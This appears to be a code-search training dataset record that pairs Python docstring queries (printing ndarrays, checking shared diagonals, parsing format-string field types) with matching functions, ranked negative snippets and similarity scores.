def ndarray_print(nd): try: x = nd.tolist() except (TypeError, NotImplementedError): x = nd.tobytes() if isinstance(nd, ndarray): offset = nd.offset flags = nd.flags else: offset = 'unknown' flags = 'unknown' print("ndarray(%s, shape=%s, strides=%s, suboffsets=%s, offset=%s, " "format='%s', itemsize=%s, flags=%s)" % (x, nd.shape, nd.strides, nd.suboffsets, offset, nd.format, nd.itemsize, flags)) sys.stdout.flush()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ndarray_print(nd):\n try:\n x = nd.tolist()\n except (TypeError, NotImplementedError):\n x = nd.tobytes()\n if isinstance(nd, ndarray):\n offset = nd.offset\n flags = nd.flags\n else:\n offset = 'unknown'\n flags = 'unknown'\n print(\n \"ndarray(%s, shape=%s, strides=%s, suboffsets=%s, offset=%s, format='%s', itemsize=%s, flags=%s)\"\n % (x, nd.shape, nd.strides, nd.suboffsets, offset, nd.format, nd.\n itemsize, flags))\n sys.stdout.flush()", "def show(self):\n m = [xo_convert(int(x)) for x in np.nditer(self.arr)]\n print(\"{} | {} | {}\".format(*m[:3]))\n print(\"--+---+--\")\n print(\"{} | {} | {}\".format(*m[3:6]))\n print(\"--+---+--\")\n print(\"{} | {} | {}\".format(*m[6:]))\n print()", "def print_array(self):\n for item in self.items:\n print(item)", "def print_array(x, idx=slice(None), message=None, message_prefix=\"SHIM - \",\n file=sys.stdout):\n return set_subtensor(x[idx],\n print(x[idx],\n message=message,\n message_prefix=message_prefix,\n file=file\n )\n )", "def dump(self, data_points):\n print(data_points)", "def __repr__(self) -> str:\n\n thresh = np.get_printoptions()[\"threshold\"]\n np.set_printoptions(threshold=20)\n extra_chars = len(self.__class__.__name__)\n arr_str = \"data=\" + str(self.data).replace(\"\\n\", \"\\n\" + \" \" * (extra_chars + 6))\n shape_str = (\n \" \" * extra_chars\n + \" shape=\"\n + str(self.shape).replace(\"\\n\", \"\\n\" + \" \" * (extra_chars + 7))\n )\n dtype_str = \" \" * extra_chars + \" dtype=\" + str(self.dtype)\n np.set_printoptions(threshold=thresh)\n return \"{klass}({data},\\n{shape},\\n{dtype})\".format(\n klass=self.__class__.__name__,\n data=arr_str,\n shape=shape_str,\n dtype=dtype_str,\n )", "def pretty_print(image_example):\n print numpy.array_str(image_example, precision=1, max_line_width=142)", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def _showdata(self, prec=4):\n print('nh {0:d} nslices {1:d} nbl {2:d} ncp {3:d} nca {4:d} '.format(\n self.nh, self.nslices, self.nbl, self.ncp, self.nca), end=\"\")\n print(\"observables in np arrays with {:d} rows\".format(self.nslices))\n\n if len(self.observables) == 4:\n print('nca', self.nca)\n else:\n print()\n np.set_printoptions(precision=prec)\n\n print(self.fp.shape, \"fp (degrees, but stored internally in radians):\\n\",\n self.fp*self.degree, \"\\n\")\n print(self.fa.shape, \"fa:\\n\", self.fa, \"\\n\")\n\n print(self.cp.shape, \"cp (degrees, but stored internally in radians):\\n\",\n self.cp*self.degree, \"\\n\")\n if len(self.observables) == 4:\n print(self.ca.shape, \"ca:\\n\", self.ca, \"\\n\")\n # print(self.info4oif_dict)\n\n print(\"hole centers array shape:\", self.ctrs.shape)\n\n print(len(self.bholes), \"baseline hole indices\\n\", self.bholes)\n print(self.bls.shape, \"baselines:\\n\", self.bls)\n\n print(self.tholes.shape, \"triple hole indices:\\n\", self.tholes)\n print(self.tuv.shape, \"triple uv vectors:\\n\", self.tuv)\n\n print(self.qholes.shape, \"quad hole indices:\\n\", self.qholes)\n print(self.quvw.shape, \"quad uvw vectors:\\n\", self.quvw)", "def _print_matrix(self):\n print(self.matrix)", "def show(arr2d):\n print (\"\\n\".join(\"\\t\".join(row) for row in arr2d))", "def __str__(self):\n return str(self.array)", "def report(self):\n s = \"Conn %s\" % (self.shape,)\n if hasattr(self,'eltype'):\n s += \", eltype=%s\" % self.eltype\n s += '\\n'\n return s + ndarray.__str__(self)", "def __str__(self):\n return str(self.arr)", "def debug(self):\n print(self.memory)\n print('r0 = %s, ip = %s' % (self.r0, self.ip))", "def printArray(arr):\n for entry in arr:\n print(entry)", "def __debug_print__(self):\n print(self.question_data)", "def print(self):\n self.__print_local(self.dataset, 0)", "def info_np(img):\n import numpy as np\n\n print ('Dimensions: ' + str(np.shape(img)))\n print ('Min value: ' + str(np.min(img)))\n print ('Avg value: ' + str(np.average(img)))\n print ('Med value: ' + str(np.median(img)))\n print ('Max value: ' + str(np.max(img)))\n print ('Std dev: ' + str(np.std(img)))\n print ('Sum: ' + str(np.sum(img)))", "def show(self, data):\n if isinstance(data, (numpy.ndarray, h5py.Dataset)):\n isAtomic = len(data.shape) == 0\n isCurve = len(data.shape) == 1 and numpy.issubdtype(data.dtype, numpy.number)\n isImage = len(data.shape) == 2 and numpy.issubdtype(data.dtype, numpy.number)\n if isAtomic:\n self.showAsString(data)\n elif isCurve:\n self.show1d(data)\n elif isImage:\n self.show2d(data)\n else:\n self.showAsString(data)\n else:\n self.showAsString(data)", "def debug(self):\n neighbors = len(self.__neighbors)\n string = self.__repr__() + f' neighbors: {self.living_neighbors()}/{neighbors}'\n for neighbor in self.__neighbors:\n string += '\\n ' + neighbor.__repr__()\n print(string)", "def print_multi_numpy(x_, val=True, shp=False):\n for i in range(x_.shape[0]):\n x = x_[i].astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_shape(self, data):\n print(data.shape)", "def print_full(self):# pragma: no cover\n print('Will now print all optional output arrays - ')\n print(' yint_seg: ')\n print((self.yint_seg))\n print(' ')\n print(' slope_seg: ')\n print(self.slope_seg)\n print(' ')\n print(' sigyint_seg: ')\n print(self.sigyint_seg)\n print(' ')\n print(' sigslope_seg: ')\n print(self.sigslope_seg)\n print(' ')\n print(' inv_var_2d: ')\n print((self.inv_var_2d))\n print(' ')\n print(' firstf_int: ')\n print((self.firstf_int))\n print(' ')\n print(' ped_int: ')\n print((self.ped_int))\n print(' ')\n print(' cr_mag_seg: ')\n print((self.cr_mag_seg))", "def debug(self):\n \n #path\n print('Path information:')\n for k, v in self.__path.items():\n print(k, v)\n \n #sample count\n print('Sample statistic of each phase')\n for k, v in self.__phase_sample_count.items():\n print(k, v)\n \n print('Sample statistic of each class')\n for k, v in self.__area_sample_count.items():\n print(k, v)\n \n print('Sample statistic of each train')\n for k, v in self.__train_sample_count.items():\n print(k, v)", "def print(self):\r\n print(\"[DEBUG] STACK: \", self.__memory.__repr__())", "def __repr__(self):\n return repr(self.matrix)" ]
[ "0.7679877", "0.68368405", "0.6631245", "0.6609683", "0.65994364", "0.65967774", "0.6263622", "0.62557095", "0.62557095", "0.62557095", "0.62557095", "0.6235029", "0.6219768", "0.6178411", "0.61287254", "0.6089198", "0.6083977", "0.60370946", "0.60179627", "0.6011618", "0.5987235", "0.5944811", "0.5894297", "0.58930874", "0.58649844", "0.5861188", "0.58610237", "0.58231217", "0.58226687", "0.581801" ]
0.7686053
0
Is (x0, y0) on a shared diagonal with (x1, y1)?
def share_diagonal(x0,y0,x1,y1): return abs(x0 - x1) == abs(y0 - y1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def share_diagonal(x0, y0, x1, y1):\r\n dy = abs(y1 - y0) # Calc the absolute y distance\r\n dx = abs(x1 - x0) # CXalc the absolute x distance\r\n return dx == dy # They clash if dx == dy\r", "def share_diagonal(x0, y0, x1, y1):\r\n dy = abs(y1 - y0) # Calc the absolute y distance\r\n dx = abs(x1 - x0) # CXalc the absolute x distance\r\n return dx == dy # They clash if dx == dy\r", "def share_diagonal(x0, y0, x1, y1):\n dy = abs(y1 - y0) # Calc the absolute y distance\n dx = abs(x1 - x0) # CXalc the absolute x distance\n return dx == dy # They clash if dx == dy", "def share_diagonal(x0, y0, x1, y1):\n dy = abs(y1 - y0) # absolute y distance\n dx = abs(x1 - x0) # absolute x distance\n return dx == dy # they clash if dx == dy, share diagonal", "def share_diagonal(x0, y0, x1, y1):\n dy = abs((x0-x1)/(y0-y1))\n return dy", "def is_diagonal(i, j):\n return 1 if i == j else 0", "def is_diagonal(i, j):\n return 1 if i == j else 0", "def is_diagonal(row, col):\n return 1 if row == col else 0", "def diag_win(board):\n\tif board[1][1] != EMPTY and (board[1][1] == board[0][2] == board[2][0] or board[1][1] == board[0][0] == board[2][2]):\n\t\treturn True\n\treturn False", "def is_at_intersection(self):\n directions = 0\n self.tile = (self.get_nearest_row(), self.get_nearest_col())\n if self.internal_map[self.tile[0] - 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0] + 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] - 1] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] + 1] not in ('x', ):\n directions += 1\n return True if directions > 2 else False", "def XRoadConnect(data, x1, y1, x2, y2):\n flag = True\n if not y1 == y2:\n return False\n x_start = min(x1, x2)\n x_end = max(x1, x2)\n for i in range(x_start + 1, x_end):\n if not data[y1][i] == 0:\n flag = False\n break\n return flag", "def is_diagonal(self):\n return self.is_upper() and self.is_lower()", "def check_diagonals(self, win: list) -> bool:\r\n for i in range(self.size - self.win_condition + 1):\r\n # [x x ]\r\n # [ x x ]\r\n # [ x x]\r\n # [ x]\r\n diagonal = []\r\n x = i\r\n y = 0\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x += 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True\r\n # [x ]\r\n # [x x ]\r\n # [ x x ]\r\n # [ x x]\r\n diagonal = []\r\n x = 0\r\n y = i\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x += 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True\r\n\r\n # [ x x]\r\n # [ x x ]\r\n # [x x ]\r\n # [x ]\r\n diagonal = []\r\n x = self.size - 1 - i\r\n y = 0\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x -= 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True\r\n # [ x]\r\n # [ x x]\r\n # [ x x ]\r\n # [x x ]\r\n diagonal = []\r\n x = self.size - 1\r\n y = 0 + i\r\n for j in range(self.size - i):\r\n diagonal.append(self.tags[x][y])\r\n x -= 1\r\n y += 1\r\n for j in range(len(diagonal) - len(win) + 1):\r\n if win == diagonal[j:j + self.win_condition]:\r\n return True", "def onlydiag(self):\n for y in xrange(0, len(self.a)):\n if not (isinstance(self.a[y], fakelist) and (len(self.a[y].a) == 0 or (len(self.a[y].a) == 1 and y in self.a[y].a))):\n return False\n return True", "def col_clashes(bs, c):\r\n for i in range(c):\r\n if share_diagonal(i,bs[i], c,bs[c]):\r\n return True\r\n return False", "def YRoadConnect(data, x1, y1, x2, y2):\n flag = True\n if not x1 == x2:\n return False\n y_start = min(y1, y2)\n y_end = max(y1, y2)\n for i in range(y_start + 1, y_end):\n if not data[i][x1] == 0:\n flag = False\n break\n return flag", "def check_diagonals(self):\n\t\tdiags = [[(0,0), (1,1), (2,2)], [(0,2), (1,1), (2,0)]]\n\n\t\tfor diag in diags:\n\t\t\tpts = 0\n\t\t\tfor loc in diag:\n\t\t\t\tif self.board[loc[0]][loc[1]] == self.marker:\n\t\t\t\t\tpts+=1\n\t\t\tif pts == 3:\n\t\t\t\tprint('WE WON')\n\t\t\t\treturn True", "def diagonal_pairings(mat):\n\tw, h = mat.shape\n\tx = mat[:-1,:-1]\n\ty = mat[1:, 1:]\n\tx_cor_list = []\n\ty_cor_list = []\n\tfor i in range(w-1):\n\t\tfor j in range(h-1):\n\t\t\tx_cor_list.append(x[i, j])\n\t\t\ty_cor_list.append(y[i, j])\n\n\treturn x_cor_list, y_cor_list", "def check_diag(self):\r\n if self.grid[4][-1] != ' ':\r\n if self.grid[0][-1] == self.grid[4][-1] and self.grid[4][-1] == self.grid[8][-1]:\r\n return (4, (self.grid[0], self.grid[8]))\r\n elif self.grid[2][-1] == self.grid[4][-1] and self.grid[4][-1] == self.grid[6][-1]:\r\n return (4, (self.grid[2], self.grid[6]))\r\n return (-1, None)", "def square2_checker(self, x, y, row2, col2):\n \n self.x = x\n self.y = y\n self.row2 = row2\n self.col2 = col2\n\n return abs(self.x - self.row2) == 1 and self.col2 == self.y \\\n or abs(self.y - self.col2) == 1 and self.row2 == self.x", "def is_neighbour(self, other, diagonal):\n return other in self.neighbours(diagonal)", "def diagonalIntersection(self):\n l1 = self.diagonalAtPoint(idx=0)\n l2 = self.diagonalAtPoint(idx=1)\n return l1.intersectionWith(l2)", "def is_symmetric(mat):\n return np.allclose(mat.T, mat)", "def is_diagonal(self):\n return self.rep.is_diagonal()", "def check_diagonals():\n global game_still_going\n # Check if any of the rows have all the same value.\n diagonal1 = board[0] == board[4] == board[8] != '_'\n diagonal2 = board[6] == board[4] == board[2] != '_'\n # If any diagonals does have a match, then game still going to False.\n if diagonal1 or diagonal2:\n game_still_going = False\n # Return winner 'X' or 'O'.\n if diagonal1:\n return board[0]\n if diagonal2:\n return board[6]", "def diagonal_win():\n\n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][i]) \n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 1\"\n return True\n \n diagonal_set = set()\n for i in range(0, board_size):\n diagonal_set.add(self.board[i][board_size - 1 - i])\n\n if diagonal_set == set([o_symbol]) or diagonal_set == set([x_symbol]):\n print \"diagonal win 2\"\n return True", "def seg_x_in_y(self, x: str, y: str) -> bool:\n return len(set(x + y)) == len(y)", "def ishomog(tr):\n \n return tr.shape == (4, 4)", "def is_connected(object_one, object_two):\n\n for vert_one in object_one.Vertexes:\n for vert_two in object_two.Vertexes:\n if (vert_one.X == vert_two.X) and (vert_one.y == vert_two.y):\n return True\n\n return False", "def is_diagonal(x):\n return (isinstance(x, tf.linalg.LinearOperatorIdentity) or\n isinstance(x, tf.linalg.LinearOperatorScaledIdentity) or\n isinstance(x, tf.linalg.LinearOperatorDiag))" ]
[ "0.8518046", "0.8518046", "0.8502754", "0.84337777", "0.7760696", "0.70689964", "0.70689964", "0.706408", "0.6565794", "0.65179807", "0.6373702", "0.63458717", "0.63303655", "0.6296012", "0.6293987", "0.62332195", "0.62295103", "0.61589813", "0.61407775", "0.6136831", "0.61246556", "0.6121262", "0.6102582", "0.6069114", "0.60655206", "0.6061314", "0.6060001", "0.6055612", "0.6049005", "0.6048393" ]
0.88636863
0
Parse a formatted string and return the names of the args and their types. Will raise a ValueError if the type is not a pyopenapi3 `Field` or an already defined Component Parameter type. In the case that the type represents a `Field`, then its type will be returned, respectively. Otherwise, if it is an already defined Component Parameter, then the name of the class that defines the parameter will be returned.
def parse_name_and_type_from_fmt_str( formatted_str: str, allowed_types: Optional[Dict[str, Component]] = None ) -> Generator[Tuple[str, Type[Field]], None, None]: for _, arg_name, _type_name, _ in Formatter().parse(formatted_str): if arg_name is not None: try: assert _type_name is not None _type = ( allowed_types[_type_name] if allowed_types is not None and _type_name in allowed_types else getattr(pyopenapi3.data_types, _type_name) ) yield arg_name, _type except AttributeError: raise ValueError( "A non-`Field` or `OpenApiObject` type was found. " f"Can't use `{_type_name}` as a type in {formatted_str}. " f"Must be a stringified pyopenapi3 `data_type`, such " f"as `pyopenapi3.data_types.String`, or a reference to a " f"Component." ) from None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_type(self, param):\n\n def evaluate(instance):\n if isinstance(instance, (Struct, Enum)):\n return instance.name\n if isinstance(instance, (Integer, Float)):\n return 'Number'\n return type(instance).__name__\n\n if isinstance(param.param_type, Array):\n return self.replace_sync(evaluate(param.param_type.element_type)) + '[]'\n return self.replace_sync(evaluate(param.param_type))", "def parse_params(txt):\n res = list()\n # First, slipt with stuff looking like \\TYPE:\n splitted = re.split(r'\\s*\\\\(\\w+)\\s*:', txt)\n # We now have a list looking like:\n # ['', 'flag', '....', 'param', '...']\n i = 1\n while i < len(splitted) - 1:\n type = splitted[i]\n rest = splitted[i+1]\n if type == \"argn\":\n name = \"remaining args\"\n desc = rest\n else:\n # first word is the name, the rest is the description:\n match = re.match(r'\\s*(\\w+)\\s*(.*)', rest, re.DOTALL)\n if not match:\n print(\"warning, failed to parse parameters\")\n print(\"near\", rest)\n break\n (name, desc) = match.groups()\n desc = clean_indent(desc)\n res.append((type, name, desc))\n i += 2\n return res", "def typeString(self):\n return Parameter.string_dict[self._field.type]", "def _params_formatter(field):\n heads = ['param']\n types = _or_types(field)\n if types:\n heads.append(types)\n heads.append(field['name'])\n tail = field.get('description', '')\n return heads, tail", "def type_name(self):\n return \"%s %s\" % (self.param_type, self.name)", "def _validate_type(self, tp: str, name: str = None):\n if tp is None:\n return None, None\n\n fields = None\n if tp.startswith('{'):\n # Submodel defined in JSON\n fields = parse_json_model(tp, modelname=name)\n if not fields:\n return None, None\n return snake_to_camel(name), fields\n\n normal_type = get_type_from_str(tp)\n if normal_type != \"None\":\n tp = normal_type\n\n return tp, fields", "def FormatParamType(self, param):\n return self.ToPpapiType(param.type_, optional=param.optional)", "def unparse_type(type_str):\n if not type_str.startswith('array'):\n return type_str\n arg_dim = type_str.lstrip('array')[0]\n data_type = type_str.lstrip('array')[1:]\n arg_type = \"vizgen.ndarray('\" + data_type + \"', \" + arg_dim + \")\"\n return arg_type", "def _parse_and_validate(self, val):\n if self._is_parameter_type:\n val = self._parse(val) if isinstance(val, str) else val\n self._validate_or_throw(val)\n return val", "def parseTypeString(inTypeString):\n curType = Type()\n curStack = []\n for c in inTypeString:\n if c == '<':\n curStack.append(curType)\n curType = Type()\n curStack[-1].templateParams.append(curType)\n elif c == '>':\n curType = curStack.pop()\n elif c == ',':\n curType = Type()\n curStack[-1].templateParams.append(curType)\n else:\n curType.name += c\n curType.trimNames()\n return curType", "def argument_type(arg):\n types = (int, float)\n \n for t in types:\n try:\n return type(t(arg))\n except ValueError:\n continue\n \n return str", "def map_param_type(param_type):\n main_type, sub_type = TYPE_INFO_RE.match(param_type).groups()\n\n if main_type in ('list', 'array'):\n # Handle no sub-type: \"required list\"\n if sub_type is not None:\n sub_type = sub_type.strip()\n\n if not sub_type:\n sub_type = 'str'\n\n # Handle list of pairs: \"optional list<pair<callsign, path>>\"\n sub_match = TYPE_INFO_RE.match(sub_type)\n if sub_match:\n sub_type = sub_match.group(1).lower()\n\n return [PARAM_TYPE_MAP.setdefault(sub_type, string_types)]\n\n return PARAM_TYPE_MAP.setdefault(main_type, string_types)", "def get_type(args_str, entry_type):\r\n # The C-method-implementations accept self as the first argument,\r\n # so a one-argument method will be invoked with zero arguments in Python.\r\n no_args = 1 if entry_type == \"method\" else 0\r\n return (\"METH_NOARGS\" if len(args_str.split(\",\")) == no_args\r\n else \"METH_VARARGS\")", "def arg_type(self):\n\n arg_type = self.ctype\n\n if 'int' in arg_type:\n arg_type = 'int'\n\n if self.is_list:\n arg_type = 'list of {}'.format(arg_type)\n\n if 'required' in self.qualifiers:\n arg_type = \"{}, optional\".format(arg_type)\n\n return arg_type", "def parse_fieldtype(value, fieldtype):\n\ttype_mapper = {\n\t\t\"int\": int,\n\t\t\"float\": float,\n\t\t\"basestring\": str,\n\t\t\"dict\": json.loads\n\t}\n\n\ttry:\n\t\tif fieldtype in type_mapper.keys():\n\t\t\treturn type_mapper[fieldtype](value)\n\t\telif fieldtype == \"list\":\n\t\t\traise Exception(\"Can't parse value to list type\")\n\t\telif fieldtype == \"date\":\n\t\t\treturn value\n\t\t# elif fieldtype == \"float\":\n\t\t# \treturn float(value)\n\t\t# elif fieldtype == \"basestring\":\n\t\t# \treturn str(value)\n\t\t# elif fieldtype == \"dict\":\n\t\t# \treturn json.loads(value)\n\texcept Exception, e:\n\t\traise e", "def _GetTypeName(cls: Optional[TypeHinter]) -> str:\n if isinstance(cls, FieldDescriptor):\n # First, check for the `sem_type` protobuf option and its `type` field.\n sem_type_option = cls.GetOptions().Extensions[semantic_pb2.sem_type]\n if sem_type_option.type in rdf_type_schemas:\n return sem_type_option.type\n\n if _IsMapField(cls):\n map_type_name = _GetTypeName(cls.message_type)\n if map_type_name.endswith(\"Entry\"):\n map_type_name = map_type_name[:-5]\n\n key_value_d = _GetMapFieldKeyValueTypes(cls)\n if key_value_d is None:\n raise AssertionError(f\"{cls} is not a map FieldDescriptor\")\n\n key_type_name = _GetTypeName(key_value_d.key)\n value_type_name = _GetTypeName(key_value_d.value)\n\n return f\"{map_type_name}Map_{key_type_name}:{value_type_name}\"\n\n if cls.message_type:\n return _GetTypeName(cls.message_type)\n\n if cls.enum_type:\n return _GetTypeName(cls.enum_type)\n\n return _GetTypeName(cls.type)\n\n if isinstance(cls, Descriptor):\n return cls.full_name\n\n if isinstance(cls, EnumDescriptor):\n return cls.full_name\n\n if isinstance(cls, type):\n return cls.__name__\n\n if isinstance(cls, int): # It's a `protobuf.Descriptor.type` value.\n return cast(str, primitive_types[cls][\"name\"])\n\n return str(cls) # Cover `BinaryStream` and `None`.", "def annotation_to_python(name, args, type_, template, sctypes):\n tab = ' ' * TABSIZE\n tokens = name.split(' ')\n pyname = ''.join([x.title() for x in tokens])\n cls = 'class {}({}):\\n'.format(pyname, type_.title())\n cls += '{}_trigedit_name = \"{}\"\\n'.format(tab, name)\n # pyargs = [type_to_sc_type(x['type']) for x in args]\n qparams = [x['type'] for x in args if x['is_quoted']]\n quoted_fields = '[\"{}\"]'.format(', '.join(qparams))\n if not quoted_fields:\n quoted_fields = ''\n cls += '{}_quoted_fields = frozenset({})\\n\\n'.format(tab, quoted_fields)\n # figure out the argument types\n imports = []\n for arg in args:\n param = arg['type']\n default = arg['default']\n if param in sctypes:\n ptype = type_to_sc_type(param, prefix='sc')\n imports.append(ptype)\n else:\n if re.search('^[0-9]+$', default):\n ptype = 'int'\n else:\n ptype = 'str'\n arg['pytype'] = ptype\n if len(args) > 0:\n typed_params = ', '.join(['{}: {}'.format(x['type'], x['pytype']) for x in args])\n cls += '{}def __init__(self, {}):\\n'.format(tab, typed_params)\n else:\n cls += '{}def __init__(self):\\n'.format(tab)\n joiner = '\\n{}{}'.format(tab, tab)\n fields = joiner.join(['self.{} = {}'.format(x['type'], x['type']) for x in args])\n if len(args) > 0:\n cls += '{}{}super().__init__()\\n{}{}{}'.format(tab, tab, tab, tab, fields)\n else:\n cls += '{}{}super().__init__()'.format(tab, tab)\n return cls, imports", "def to_value_type(cls, val_str, type_arg, member_type):\n if val_str is None:\n return None\n if type_arg == bool:\n return cls.ensure_bool(val_str)\n try:\n if type_arg == list:\n return ListValueComponent.create(val_str, member_type=member_type)\n if type_arg == dict:\n return DictValueComponent.create(val_str)\n return type_arg(val_str)\n except (TypeError, ValueError) as e:\n if issubclass(type_arg, Enum):\n choices = \", \".join(f\"{choice.value}\" for choice in type_arg)\n raise ParseError(f\"Invalid choice '{val_str}'. Choose from: {choices}\")\n raise ParseError(\n f\"Error applying type '{type_arg.__name__}' to option value '{val_str}': {e}\"\n )", "def show_type(self, arg):\n return (str(arg), str(type(arg)), arg)", "def type(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def _params_formatter(field, description):\n heads = ['param']\n types = _or_types(field)\n if types:\n heads.append(types)\n heads.append(rst.escape(field['name']))\n tail = description\n return heads, tail", "def get_parameter(pstring):\n parameters = pstring.replace(',', ' ').split()\n if len(parameters) == 1:\n init_value = float(parameters[0])\n return (init_value, None, None)\n elif len(parameters) == 3:\n init_value = float(parameters[0])\n if parameters[1].upper() == 'NONE':\n lower_value = None\n else:\n lower_value = float(parameters[1])\n if parameters[2].upper() == 'NONE':\n upper_value = None\n else:\n upper_value = float(parameters[2])\n return (init_value, lower_value, upper_value)\n else:\n raise ValueError('Invalid parameter format: %s' % pstring)", "def extract_name_description(self, param):\n name = None\n description = None\n if getattr(param, 'description', None):\n description = param.description\n\n if getattr(param, 'primary_name', None):\n name = param.primary_name\n elif getattr(param, 'param_type', None):\n if getattr(param.param_type, 'name', None):\n name = param.param_type.name\n if not description and getattr(param.param_type, 'description', None):\n description = param.param_type.description\n elif getattr(param.param_type, 'element_type', None) and \\\n getattr(param.param_type.element_type, 'name', None):\n name = param.param_type.element_type.name\n if not description and getattr(param.param_type.element_type, 'description', None):\n description = param.param_type.element_type.description\n\n return self.replace_sync(name), self.extract_description(description)", "def parse_solr_field_name(solr_field_name):\n match = _FIELD_NAME_PATTERN.match(solr_field_name)\n if not match:\n raise ValueError('Provided Solr field does not belong to Search Service')\n field_name = match.group('field_name')\n solr_type = match.group('solr_type')\n language = match.group('language') or ''\n return field_name, solr_type, language", "def get_field_parameters(self, in_parms):\n if len(in_parms) == 0: # Check if there are params\n return None # If that's the case, return None\n\n values = [] # Empty values\n is_msg = False # Check if the param is a message\n for parm in in_parms: # Loop over params\n if parm.type == \"Field\": # If it is a message\n is_msg = True # Set is_message to true\n continue # Go to top of loop\n _type = eval(parm.type) # create a type object\n value = _type(parm.value) # Create the value, and cast it to the type\n values.append(value) # Add that into the parameters\n if is_msg is True: # check if is a message\n return in_parms # Return input params\n elif len(values) == 1: # If there is only one element\n return values[-1] # Return just that element\n else: # Otherwise\n return values # Return the params", "def type_str_of(x):\n try:\n # what other way? this is only way I know of, to detect XML-RPC server.\n if x.hasattr(x,\"_ServerProxy__host\"):\n return \"XML-RPC\"\n \n return { type(\"string\"): \"STR\",\n type(42): \"INT\",\n type(42.0): \"FLOAT\",\n type([]): \"LIST\",\n type({}): \"DICT\",\n type(Ref(\"\")): \"REF\",\n }[ type(x) ]\n except:\n return \"Not a string, int, float, list, or dict.\"", "def parse_typename(typename):\n if typename is None:\n raise ValueError(\"function type must be provided\")\n idx = typename.rfind(\"/\")\n if idx < 0:\n raise ValueError(\"function type must be of the from namespace/name\")\n namespace = typename[:idx]\n if not namespace:\n raise ValueError(\"function type's namespace must not be empty\")\n type = typename[idx + 1:]\n if not type:\n raise ValueError(\"function type's name must not be empty\")\n return namespace, type", "def type_def_line(cls, line):\n type_def = None\n if not cls.type_match(line):\n sline = line.strip()\n if sline.lower()[0:4] == 'type':\n if '::' in sline:\n elements = sline.split('::')\n type_name = elements[1].strip()\n type_props = [x.strip() for x in elements[0].split(',')[1:]]\n else:\n # Plain type decl\n type_name = sline.split(' ', 1)[1].strip()\n type_props = None\n # End if\n if '(' in type_name:\n tnstr = type_name.split('(')\n type_name = tnstr[0].strip()\n type_params = '(' + tnstr[1].rstrip()\n else:\n type_params = None\n # End if\n type_def = [type_name, type_props, type_params]\n # End if\n # End if\n return type_def", "def get_template_arg(self, tag, the_args, for_class):\n if the_args:\n args = the_args.split(\",\")\n args = [x.strip() for x in args]\n else:\n args = []\n\n class_name = \"\"\n if for_class:\n class_name = for_class.name\n\n bad_arg = False\n\n tag = tag.upper();\n if tag == \"NAME\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return i.name\n bad_arg = True\n\n if tag == \"STRUCT\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return i.class_struct_name\n bad_arg = True\n\n if tag == \"TYPE_STRUCT\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return i.type_struct_name\n bad_arg = True\n\n if tag == \"NEW\":\n if len(args):\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"%s()\" % i.class_new_func_name\n bad_arg = True\n\n if tag == \"IS_INSTANCE\":\n if len(args) > 1:\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"%s(%s)\" % (i.class_is_instance_func_name, args[0])\n bad_arg = True\n\n if tag == \"CAST\":\n if len(args) > 1:\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"reinterpret_cast<%s*>(%s)\" % (i.class_struct_name, args[0])\n bad_arg = True\n\n if tag == \"COPY\":\n if len(args) > 1:\n class_name = args[-1]\n for i in self.classes:\n if i.name == class_name:\n return \"%s(%s)\" % (i.class_copy_func_name, args[0])\n bad_arg = True\n\n if bad_arg:\n raise ValueError(\"Bad arguments '%s' to template tag '%s' (object:%s)\" % (the_args, tag, class_name))\n raise ValueError(\"Unknown template tag '%s'\" % tag)", "def 